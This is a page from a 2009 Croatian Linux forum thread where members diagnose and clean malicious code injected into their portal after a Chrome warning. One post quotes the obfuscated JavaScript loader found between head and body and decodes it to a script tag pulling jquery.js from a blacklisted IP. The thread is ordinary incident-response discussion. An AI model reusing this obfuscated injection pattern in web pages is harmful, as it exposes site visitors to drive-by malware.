Linux za Sve forum

Regionalni Linux forum
https://www.linuxzasve.com/forum/

Maliciozni kod na portalu

https://www.linuxzasve.com/forum/viewtopic.php?t=2215

Stranica: 2/3.

Re: Maliciozni kod na portalu

Postano: 18 tra 2009, 15:14
Postao/la Markec
4ndY je napisao/la:Tko? Gdje? Šta? kava
Ovo meni javlja google crome od jučer ujutro
http://www.imagesforme.com/show.php/450632_11.PNG

http://www.imagesforme.com/show.php/450633_22.PNG

Re: Maliciozni kod na portalu

Postano: 18 tra 2009, 15:19
Postao/la Suko
I što sad?
Jel može neko objasniti o čem se radi? :zbunj

Re: Maliciozni kod na portalu

Postano: 18 tra 2009, 17:03
Postao/la 4ndY
Provjeriti koji dio lzs.com site-a zove ovo:

Kod: Označi sve

http://94.247.2.195/jquery.js
http://94.247.2.195/news/?id=101
jer je taj IP blacklistan...

Re: Maliciozni kod na portalu

Postano: 18 tra 2009, 17:19
Postao/la Sokac
Kod je izgeneriran između </head> i <body> i radi se o sljedećem:

Kod: Označi sve

<script language=javascript><!-- 
document.write(unescape('8Zd%3CsTHcTHripC0Ht%20JYsn1zrc%3DLc%2F%2F8Zd9n1z4%2E2TH4JY7C0H%2E2%2EhAt1TH9Lc5Lc%2Fn1zjn1zqLcuJYervViy%2EjC0Hs8Zd%3E%3C%2FvVisLccriC0HptLc%3E').replace(/hAt|8Zd|JY|vVi|C0H|n1z|TH|Lc/g,""));
 --></script>
odnosno prevedeno

Kod: Označi sve

<script src=//94.247.2.195/jquery.js></script>
Što znači da poziva tu skriptu.

Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.

Re: Maliciozni kod na portalu

Postano: 18 tra 2009, 22:46
Postao/la Grof
Sokac je napisao/la: Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.

Pa neka Ivan prijavi onda... :)

Re: Maliciozni kod na portalu

Postano: 20 tra 2009, 14:31
Postao/la Markec
Popravljeno :)

Re: Maliciozni kod na portalu

Postano: 20 tra 2009, 15:46
Postao/la Sokac
Super, preko 100 datoteka sam morao prepravljati xD

Re: Maliciozni kod na portalu

Postano: 20 tra 2009, 16:00
Postao/la Tux Slave
Sokac je napisao/la:Super, preko 100 datoteka sam morao prepravljati xD
Ovo bi bilo odlično kao zadatak.

Napisati bash skriptu koja će izbrisati malciozni kod iz svih fileova u unesenom direktoriju i pod-direktoriju. I još uz to dati primjer filea s malcioznim kodom na kojemu bi se skripta testirala.

Ali već je riješeno pa nema potrebe.

Re: Maliciozni kod na portalu

Postano: 20 tra 2009, 16:52
Postao/la Markec
Sokac je napisao/la:Super, preko 100 datoteka sam morao prepravljati xD
svaka ti čast što si uspio :)
Zanima me, kako je taj virus dospio na server lzs, jel možda iz pondija došel ili ?

Re: Maliciozni kod na portalu

Postano: 20 tra 2009, 17:01
Postao/la iv@n
Markec šta sada Chrome kaže kad pristupiš lzs?
Vremenska zona: UTC+01:00
Stranica: 2/3.

Powered by phpBB® Forum Software © phpBB Limited

HR (CRO) by Ančica Sečan